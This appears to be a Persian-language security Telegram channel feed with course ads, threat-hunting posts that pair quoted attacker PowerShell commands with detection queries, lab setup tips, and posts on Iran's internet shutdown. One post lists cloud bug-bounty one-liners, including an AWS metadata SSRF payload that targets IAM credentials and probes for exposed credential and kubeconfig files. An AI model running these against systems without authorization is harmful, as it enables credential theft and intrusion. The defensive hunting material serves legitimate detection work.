Forwarded from ⚔️ Ethical Hacking ⚔️ (Sajjad Teymouri)
🎉 تخفیف ویژه ۵۰٪ روی دورههای آموزشی؛ فرصتی عالی برای ورود جدی به دنیای SOC و امنیت سایبری
این دورهها بر اساس تجربه عملی در بازار کار و نیاز واقعی شرکتها طراحی شدهاند و تاکنون صدها ساعت آموزش کاربردی و مبتنی بر پروژه ارائه شده است.
1️⃣ دوره جامع SOC Tier 1 (بر اساس تجربیات عملی بازار کار)
2️⃣ دوره تخصصی SOC Tier 2 (مخصوص بازار کار – در حال برگزاری)
3️⃣ دوره جامع پیشنیازهای تست نفوذ (۹ دوره در یک مسیر کامل)
و...
برای مشاوره رایگان و ثبت نام با ایدی زیر در تلگرام در تماس باشید.
🆔 https://t.me/steymouri93
نکته : دوستانی که شرایط اقتصادی خوبی ندارند امکان خرید اقساطی هم براشون فراهم هست.
من با اکثر بچهها کنار میام ❤️
مارو به دوستاتون معرفی کنید.
🆔 @Sajjad_Teymouri
این دورهها بر اساس تجربه عملی در بازار کار و نیاز واقعی شرکتها طراحی شدهاند و تاکنون صدها ساعت آموزش کاربردی و مبتنی بر پروژه ارائه شده است.
1️⃣ دوره جامع SOC Tier 1 (بر اساس تجربیات عملی بازار کار)
2️⃣ دوره تخصصی SOC Tier 2 (مخصوص بازار کار – در حال برگزاری)
3️⃣ دوره جامع پیشنیازهای تست نفوذ (۹ دوره در یک مسیر کامل)
و...
برای مشاوره رایگان و ثبت نام با ایدی زیر در تلگرام در تماس باشید.
🆔 https://t.me/steymouri93
نکته : دوستانی که شرایط اقتصادی خوبی ندارند امکان خرید اقساطی هم براشون فراهم هست.
من با اکثر بچهها کنار میام ❤️
مارو به دوستاتون معرفی کنید.
🆔 @Sajjad_Teymouri
🤖 XBOW
🔖 — شماره ۱ جهان در H1
برای اولین بار، شکارچی باگ هوش مصنوعی خودران به صدر جدول جهانی رسید! و در حالی که تو هنوز به گذاشتن گیومه ادامه میدهی، باید بگویم که این نه گذشته است و نه آینده، بلکه اکنون است!
گروه جهت مشارکت در این گفتگو :
#باگ_بانتی
@TryHackBox | @TryHackBoxOfficial
🔖 — شماره ۱ جهان در H1
برای اولین بار، شکارچی باگ هوش مصنوعی خودران به صدر جدول جهانی رسید! و در حالی که تو هنوز به گذاشتن گیومه ادامه میدهی، باید بگویم که این نه گذشته است و نه آینده، بلکه اکنون است!
نظرتون راجب این چیه؟
گروه جهت مشارکت در این گفتگو :
https://t.me/+XPV3S0tygl1lZGE0
#باگ_بانتی
@TryHackBox | @TryHackBoxOfficial
🤔3🔥1
🔖 استفاده از ماشینهای مجازی برای بایپس کردن ابزارهای امنیتی روز به روز محبوب تر میشود. امروز به یک نمونه دیگر از پیادهسازی زیرتکنیک Hide Artifacts: Run Virtual Instance (T1564.006) نگاهی خواهیم انداخت.
بر اساس گزارش، مهاجم قابلیت Hyper-V را بر روی یک ماشین ویندوزی که به خطر افتاده بود، فعال کرد و سپس یک ماشین مجازی مبتنی بر Alpine Linux که حاوی بدافزار بود، دانلود و وارد کرد.
پس از دانلود، ماشین مجازی با استفاده از PowerShell وارد شد:
همچنین از PowerShell برای راهاندازی ماشین مجازی تازه وارد شده استفاده شد:
به عنوان مثال، میتوان به دنبال دستورات مربوط به مدیریت ماشین های مجازی گشت:
🕊 @TryHackBox | @TryHackBoxOfficial
#امنیت_سایبری
بر اساس گزارش، مهاجم قابلیت Hyper-V را بر روی یک ماشین ویندوزی که به خطر افتاده بود، فعال کرد و سپس یک ماشین مجازی مبتنی بر Alpine Linux که حاوی بدافزار بود، دانلود و وارد کرد.
پس از دانلود، ماشین مجازی با استفاده از PowerShell وارد شد:
"cmd.exe" /C powershell.exe -c import-vm -path "c:\\programdata\\microsoft\\AppV\\app\\Virtual Machines\\1DBCC80B-5803-4AF1-8772-712C688F408A.vmcx" -Copy -GenerateNewId > c:\\Programdata\\WindowsUpdateTask_t.tmp 2>&1
همچنین از PowerShell برای راهاندازی ماشین مجازی تازه وارد شده استفاده شد:
"cmd.exe" /C powershell.exe -c Start-VM -name WSL > c:\\Programdata\\WindowsUpdateTask_R.tmp 2>&1
به عنوان مثال، میتوان به دنبال دستورات مربوط به مدیریت ماشین های مجازی گشت:
event_type: "processcreatewin"
AND
proc_file_path: "powershell.exe"
AND
cmdline: ("import-vm" OR "start-vm")
آیا تا به حال با تکنیک های مشابه ای مواجه شدهاید؟ نظرات و تجربیات خود را به اشتراک بگذارید!
🕊 @TryHackBox | @TryHackBoxOfficial
#امنیت_سایبری
Bitdefender
Curly COMrades: Evasion and Persistence via Hidden Hyper-V Virtual Machines
I'd like to thank my coauthors Adrian Schipor and Martin Zugec for their invaluable contributions to this research.
❤5👍3
🔖 مهاجمان همچنان به آزمایش با پلتفرم های مختلف مدیریت از راه دور ادامه می دهند، بنابراین امروز یک مثال دیگر از ابزارهای دسترسی از راه دور را بررسی میکنیم: نرمافزار Desktop Remote (T1219.002).
به مورد UNK_SmudgedSerpent نگاه میکنیم. مهاجم از ایمیل های فیشینگ برای سرقت اطلاعات حساب کاربری و همچنین برای ارسال آرشیوهایی با فایل های MSI استفاده کرده است که RMM را بارگذاری میکنند.
در اکثر موارد، مهاجمان از PDQConnect نرمافزار نظارت و مدیریت از راه دور استفاده کردهاند.
اگر شما از این نرمافزار در زیرساخت خود استفاده نمیکنید، این می تواند تارگت خوبی برای شکار باشد:
همچنین میتوانید به دنبال دامنههای مرتبط بگردید:
🕊 @TryHackBox | 🥀 @TryHackBoxOfficial
#امنیت_سایبری
به مورد UNK_SmudgedSerpent نگاه میکنیم. مهاجم از ایمیل های فیشینگ برای سرقت اطلاعات حساب کاربری و همچنین برای ارسال آرشیوهایی با فایل های MSI استفاده کرده است که RMM را بارگذاری میکنند.
در اکثر موارد، مهاجمان از PDQConnect نرمافزار نظارت و مدیریت از راه دور استفاده کردهاند.
اگر شما از این نرمافزار در زیرساخت خود استفاده نمیکنید، این می تواند تارگت خوبی برای شکار باشد:
event_type: "processcreatewin"
AND
proc_file_productname: "PDQConnectAgent"
همچنین میتوانید به دنبال دامنههای مرتبط بگردید:
event_type: "dnsreqwin"
AND
dns_rname: "app.pdq.com"
نظرات خود را با ما به اشتراک بگذارید
🕊 @TryHackBox | 🥀 @TryHackBoxOfficial
#امنیت_سایبری
Proofpoint
Crossed wires: a case study of Iranian espionage and attribution | Proofpoint US
Proofpoint would like to thank Josh Miller for his initial research on UNK_SmudgedSerpent and contribution to this report. Key findings Between June and August 2025,
👍3❤2🕊1
🔖 مینی دوره #رایگان نصب و راهاندازی لابراتورهای تست نفوذ وب قسمت اول : DVWA، Juice Shop و VulnerableApp
توی این ویدئو نحوه نصب راحت و آسان سه تا لابراتوار فوق العاده برای تمرین گفتیم
🔗از لینک هایی که گذاشتیم میتونید برید و سر بزنید به اصل داکیومنت ها و بخونید
⚠️توصیه مهم ای که هست حتما سرویس ها رو بعد از استفاده خاموش کنید
"دست هاتون رو آلوده کنید و شروع کنید به تمرین تمرین تمرین"
🔗 https://youtu.be/G6jdNx5JHv4
ما رو در شبکه های زیر دنبال داشته باشید :
🥀 @TryHackBox | @TryHackBoxOfficial
Linkedin | YouTube | GitHub | Insta
#HomeLab #WebPentest #dvwa #docker
توی این ویدئو نحوه نصب راحت و آسان سه تا لابراتوار فوق العاده برای تمرین گفتیم
1 - dvwa : https://github.com/sagikazarmark/docker-dvwa
2 - juice shop : https://github.com/juice-shop/juice-shop
3 - VunlableApp : https://github.com/SasanLabs/VulnerableApp
🔗از لینک هایی که گذاشتیم میتونید برید و سر بزنید به اصل داکیومنت ها و بخونید
⚠️توصیه مهم ای که هست حتما سرویس ها رو بعد از استفاده خاموش کنید
"دست هاتون رو آلوده کنید و شروع کنید به تمرین تمرین تمرین"
🔗 https://youtu.be/G6jdNx5JHv4
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
ما رو در شبکه های زیر دنبال داشته باشید :
🥀 @TryHackBox | @TryHackBoxOfficial
Linkedin | YouTube | GitHub | Insta
#HomeLab #WebPentest #dvwa #docker
👍8❤2
Forwarded from
AD Enumeration w SC - @TryHackBox.pdf
755.8 KB
🔖 در عملیات تیم قرمز، اغلب با پیادهسازی های داخلی VDI روبرو میشویم که دسترسی به اینترنت و شبکه خارجی ندارند، و به همین دلیل نمیتوانیم اسکریپت های PowerShell خود را برای شمارش AD و کاربران آن در سیستم های آسیبدیده دانلود کنیم.
در این آموزش، به بررسی این دستورات تک خطی میپردازیم که میتوانند به ما در شمارش AD کمک کنند.
توییتر بنده : https://www.x.com/kavehxnet
🥀🕊🖤
@KavehOffSec
#ردتیم
در بیشتر دوره های تیم قرمز، دانشجویان را تشویق می کنند تا از اسکریپت های PowerShell آماده برای شمارش محیط AD استفاده کنند، مانند powerview.ps1، که روشی بسیار مناسب و غیرپیچیده است. اما اگر این روش مناسب برای ما نامناسب شود و اجازه دانلود اسکریپتهای PowerShell یا هر ابزار دیگری از اینترنت در سیستم آسیبدیده را نداشته باشیم، چه باید کرد؟
اسکریپتهایی مانند Powerview.ps1 از توابع برای سادهسازی کارها استفاده میکنند. اما برخی از دستورات تک خطی وجود دارند که می توانند همان کار را در صورت عدم دسترسی به powerview انجام دهند.
در این آموزش، به بررسی این دستورات تک خطی میپردازیم که میتوانند به ما در شمارش AD کمک کنند.
توییتر بنده : https://www.x.com/kavehxnet
🥀🕊🖤
@KavehOffSec
#ردتیم
1👏3❤1🔥1
✎ Cloud Security One Liners
• AWS S3 Bucket Finder
• S3 Permission Check
• Firebase Database
• Azure Blob Storage
• GCP Storage
• AWS Metadata SSRF
• Cloud Credential Files
@TryHackBox | @TryHackBoxOfficial
#باگ_بانتی #کلاد 🕊🥀
• AWS S3 Bucket Finder
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt
• S3 Permission Check
cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'
• Firebase Database
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"
• Azure Blob Storage
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt
• GCP Storage
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt
• AWS Metadata SSRF
cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"
• Cloud Credential Files
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt
@TryHackBox | @TryHackBoxOfficial
#باگ_بانتی #کلاد 🕊🥀
❤3
در این شرایط بحرانی، حفظ امنیت و سلامت خود و خانواده تان از اهمیت ویژه ای برخوردار است. لطفاً به دقت مراقب یکدیگر باشید و اقلام ضروری را تهیه کنید.
• ذخیره مواد غذایی خشک و غیرپرمصرف: حداقل یک هفته.
• آب آشامیدنی: سازمان های امدادی معمولاً 2–3 لیتر به ازای هر نفر در روز پیشنهاد میکنند (برای 3 روز = 6–9 لیتر برای هر نفر). بهتر است مطابق دستورالعمل های رسمی محاسبه کنید.
• سوخت: کافی برای 200–300 کیلومتر سفر یا بر اساس نیاز محلی؛ باک، بررسی وضعیت خودرو و حمل ابزار لازم.
• آمادگی برای قطع برق: چراغ قوه، باتری اضافی، پاوربانک، شارژر خورشیدی یا ژنراتور کوچک در صورت امکان.
• ارتباط آفلاین: نصب اپلیکیشن های معتبر برای پیام رسانی بدون اینترنت (قبل از بحران، قابلیتها و امنیتشان را بررسی کنید).
• همبستگی محلهای: کمک به سالمندان، جمعآوری داروهای ضروری، ذخیره دارایی نقدی کوچکی (پول نقد) و برنامه ریزی تماس های اضطراری.
مواظب خود و خانواده خود باشید
• ذخیره مواد غذایی خشک و غیرپرمصرف: حداقل یک هفته.
• آب آشامیدنی: سازمان های امدادی معمولاً 2–3 لیتر به ازای هر نفر در روز پیشنهاد میکنند (برای 3 روز = 6–9 لیتر برای هر نفر). بهتر است مطابق دستورالعمل های رسمی محاسبه کنید.
• سوخت: کافی برای 200–300 کیلومتر سفر یا بر اساس نیاز محلی؛ باک، بررسی وضعیت خودرو و حمل ابزار لازم.
• آمادگی برای قطع برق: چراغ قوه، باتری اضافی، پاوربانک، شارژر خورشیدی یا ژنراتور کوچک در صورت امکان.
• ارتباط آفلاین: نصب اپلیکیشن های معتبر برای پیام رسانی بدون اینترنت (قبل از بحران، قابلیتها و امنیتشان را بررسی کنید).
• همبستگی محلهای: کمک به سالمندان، جمعآوری داروهای ضروری، ذخیره دارایی نقدی کوچکی (پول نقد) و برنامه ریزی تماس های اضطراری.
مواظب خود و خانواده خود باشید
👍6❤2👎1
📣 ارسال لینک و فایل داخل گروه برای شرایط فعلی آزاد شد رفقا.
می تونید با هم ارتباط بگیرید و لینک و فایل کانفینگ و... تبادل کنید.
برای همتون آرزوی سلامتی دارم. به امید روزی که حال دل و.... هممون بهتر از گذشته باشه
t.me/TryHackBoxGroup 🔗
می تونید با هم ارتباط بگیرید و لینک و فایل کانفینگ و... تبادل کنید.
برای همتون آرزوی سلامتی دارم. به امید روزی که حال دل و.... هممون بهتر از گذشته باشه
t.me/TryHackBoxGroup 🔗
Telegram
TryHackBoxGp
بحث خارج از امنیت ممنوع
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
گپ پرسش و پاسخ
کانال ها :
@TryHackBox
@TryHackBoxOfficial
❤4
این سایت ها وایت لیست شدن چک کنید.
پیپ تست زدم نیم ساعت پیش کار کرد، صحت بقیه اطلاع ندارم
https://react.dev
http://ubuntu.com
http://Python.org
https://vercel.com/
https://nextjs.org/
https://sourceforge.net/
https://letsencrypt.org/
پیپ تست زدم نیم ساعت پیش کار کرد، صحت بقیه اطلاع ندارم
https://react.dev
http://ubuntu.com
http://Python.org
https://vercel.com/
https://nextjs.org/
https://sourceforge.net/
https://letsencrypt.org/
react.dev
React is the library for web and native user interfaces. Build user interfaces out of individual pieces called components written in JavaScript. React is designed to let you seamlessly combine components written by independent people, teams, and organizations.
👍6❤2👎1
سایت Lets encrypt داخل مرورگر باز میشه، اما امکان تمدید ssl با certbot همچنان مقدور نیست و ارور connection برمیگردونه
❤1👍1
مشخص نیست اختلال هست یا مرحله مرحله قراره حالت عادی برگردیم
آپدیت: اختلال بود و رفع شده
👍4👎1
گیت هاب در دسترس قرار گرفته
اما امکان دانلود Release پروژه ها بدون VPN ندارید.
اما امکان دانلود Release پروژه ها بدون VPN ندارید.
🐳7🤔5🌚3👨💻3👎1👏1🎃1
Forwarded from NetBlocks
📈 Confirmed: Live metrics show a partial restoration to internet connectivity in #Iran on day 88, after 2093 hours of near-total isolation from international networks, the longest nationwide internet shutdown in modern history. It is unclear if the restoration will be sustained.
❤1
💢 پایان بزرگترین خاموشی دیجیتال برای ایرانیان لبخندی تلخ پس از ۸۸ روز تاریکی
➖➖➖➖➖
در واپسین روزهای آن ۸۸ روزِ طاقتفرسا، نفسِ جمعیِ جامعه را میشد در قالبِ اضطرابی خام و پنهان دید، ترس از قطع ارتباط، حس بیاطمینانیِ کسبوکارها و خشمِ فروخوردهای که بهجای گفتگو به بازارِ راهحلهای فردی و پرهزینه سوق داده شد. این پایان، بیش از یک بازگشت تکنیکی به اتصال، فرصتی است برای التیامِ جمعی برای تبدیلِ خشمِ پراکنده به مطالبهای مدنی برای شفافیت و دسترسیِ برابر شهروندان .
در نهایت کاربران ایرانی از طولانیترین تاریکی دیجیتال بیرون آمدند، انتظار به پایان رسید و اکنون با همان فیلترشکن های فعال، تجربهای از اتصال هرچند نه کاملاً آزاد در دسترس است.
نیازی به صرف هزینههای هنگفت برای کانفیگهای اختصاصی نیست؛ امروز راههای معقول تر و مقرون به صرفهتری برای بازیابی دسترسی وجود دارد و خرید بستههای قیمتبر دیگر شرط لازمِ آنلاینشدن نیست ( نیاز به خرید کانفیگ های میلیونی نیست ).
اگرچه نباید ساده انگاشت که خرید سرویسهای پولی یا کانفیگها بیمعناست؛ اما تجربه نشان داد که اتکا به راهحلهای انفرادی و پرهزینه نمیتواند جایگزین تلاش جمعی و فشار عمومی برای بازگرداندن دسترسی عمومی شود. کسانی که از فروش کانفیگ سود میبرند ممکن است از تعجیل در بازگردانی کامل سرویسها منفعت نبرند؛ بنابراین هوشیاری عمومی و مطالبهٔ شفافیت از مسئولان ضروری است.
لبخند، پس از ۸۸ روز خاموشی تلخ است؛ آن روزها خاطرهای از ناامنی، اضطراب و قطعصلح اقتصادی برجای گذاشت که نمیتوان بیتفاوت از کنارش گذشت. من شخصاً در آن دوره سراغ خرید کانفیگ نرفتم؛ معتقدم در شرایطی که دسترسی عمومی مختل است، اولویت باید بازگرداندن سرویس برای همه باشد نه راهحلهای فردی. در عین حال امیدوارم توسعهدهندگان ابزارهایی خلق کنند که ترافیکشان کمتر قابلشناسایی و مقاومتشان در برابر اختلال و قطعی بیشتر باشد.
این ۸۸ روز، در کنار تلخی ها، درسهای مهمی آورد:
آسیبپذیری زیرساختها آشکار شد، کسبوکارهای کوچک و فروشگاههای آنلاین متحمل زیان شدند، پروژهها به تعویق افتاد و فرصتهای اقتصادی از دست رفت.
اضطراب ناشی از قطع ارتباط، احساس بیاطمینانی صاحبان کسبوکار، و فشار روانی کاربرانی که برای حفظ ارتباط به گزینههای پرهزینه روی آوردند همه اینها تصویر روشنی از هزینههای پنهان چنین رخدادهایی ارائه میدهد و به مخاطب یادآوری میکند که راهحلهای جمعی و شفافیت سیستماتیک، تنها راه جلوگیری از تکرار آن است.
کاش روزی برسد که «فیلترینگ» و «کانفیگ» تنها واژههایی تاریخی باشند و دسترسی امن و پایدار به اینترنت، حقی بدیهی برای همه است.
با احترام
کاوه - تیم TryHackBox
#اینترنت
➖➖➖➖➖
در واپسین روزهای آن ۸۸ روزِ طاقتفرسا، نفسِ جمعیِ جامعه را میشد در قالبِ اضطرابی خام و پنهان دید، ترس از قطع ارتباط، حس بیاطمینانیِ کسبوکارها و خشمِ فروخوردهای که بهجای گفتگو به بازارِ راهحلهای فردی و پرهزینه سوق داده شد. این پایان، بیش از یک بازگشت تکنیکی به اتصال، فرصتی است برای التیامِ جمعی برای تبدیلِ خشمِ پراکنده به مطالبهای مدنی برای شفافیت و دسترسیِ برابر شهروندان .
در نهایت کاربران ایرانی از طولانیترین تاریکی دیجیتال بیرون آمدند، انتظار به پایان رسید و اکنون با همان فیلترشکن های فعال، تجربهای از اتصال هرچند نه کاملاً آزاد در دسترس است.
نیازی به صرف هزینههای هنگفت برای کانفیگهای اختصاصی نیست؛ امروز راههای معقول تر و مقرون به صرفهتری برای بازیابی دسترسی وجود دارد و خرید بستههای قیمتبر دیگر شرط لازمِ آنلاینشدن نیست ( نیاز به خرید کانفیگ های میلیونی نیست ).
اگرچه نباید ساده انگاشت که خرید سرویسهای پولی یا کانفیگها بیمعناست؛ اما تجربه نشان داد که اتکا به راهحلهای انفرادی و پرهزینه نمیتواند جایگزین تلاش جمعی و فشار عمومی برای بازگرداندن دسترسی عمومی شود. کسانی که از فروش کانفیگ سود میبرند ممکن است از تعجیل در بازگردانی کامل سرویسها منفعت نبرند؛ بنابراین هوشیاری عمومی و مطالبهٔ شفافیت از مسئولان ضروری است.
لبخند، پس از ۸۸ روز خاموشی تلخ است؛ آن روزها خاطرهای از ناامنی، اضطراب و قطعصلح اقتصادی برجای گذاشت که نمیتوان بیتفاوت از کنارش گذشت. من شخصاً در آن دوره سراغ خرید کانفیگ نرفتم؛ معتقدم در شرایطی که دسترسی عمومی مختل است، اولویت باید بازگرداندن سرویس برای همه باشد نه راهحلهای فردی. در عین حال امیدوارم توسعهدهندگان ابزارهایی خلق کنند که ترافیکشان کمتر قابلشناسایی و مقاومتشان در برابر اختلال و قطعی بیشتر باشد.
این ۸۸ روز، در کنار تلخی ها، درسهای مهمی آورد:
آسیبپذیری زیرساختها آشکار شد، کسبوکارهای کوچک و فروشگاههای آنلاین متحمل زیان شدند، پروژهها به تعویق افتاد و فرصتهای اقتصادی از دست رفت.
اضطراب ناشی از قطع ارتباط، احساس بیاطمینانی صاحبان کسبوکار، و فشار روانی کاربرانی که برای حفظ ارتباط به گزینههای پرهزینه روی آوردند همه اینها تصویر روشنی از هزینههای پنهان چنین رخدادهایی ارائه میدهد و به مخاطب یادآوری میکند که راهحلهای جمعی و شفافیت سیستماتیک، تنها راه جلوگیری از تکرار آن است.
کاش روزی برسد که «فیلترینگ» و «کانفیگ» تنها واژههایی تاریخی باشند و دسترسی امن و پایدار به اینترنت، حقی بدیهی برای همه است.
⭕ با توجه به ۸۸ روز قطعی اینترنت و عدم دسترسی به منابع آنلاین، خطرات و آسیبپذیریهای متعددی برای سازمانها و نهادهای دولتی به وجود آمده است. این مدت زمان طولانی، فرصتی را برای هکرها فراهم کرده تا با اهداف غیرقانونی خود به اطلاعات حساس دسترسی پیدا کنند و آسیبپذیری های موجود را شناسایی کنند.
با بازگشت اینترنت، احتمال حملات سایبری افزایش یافته و سازمان ها باید به شدت مراقب باشند. این حملات میتوانند شامل نفوذ به سیستم ها از طریق تکنیک های فیشینگ، بدافزارها و حملات DDoS باشند که هدف آن ها مختل کردن زیرساختهای حیاتی و سرقت اطلاعات حساس است.
به علاوه، با توجه به اینکه بسیاری از کارمندان در این مدت از راه دور کار کردهاند، احتمال بروز مشکلات امنیتی ناشی از استفاده از شبکههای ناامن و عدم رعایت پروتکل های امنیتی نیز افزایش یافته است. بنابراین، ضروری است که سازمانها و نهادهای دولتی اقدامات امنیتی خود را تقویت کرده و بر روی آموزش کارکنان در زمینه امنیت سایبری تمرکز کنند تا از هرگونه تهدید احتمالی جلوگیری شود.
با احترام
کاوه - تیم TryHackBox
#اینترنت
❤6👍3🌚2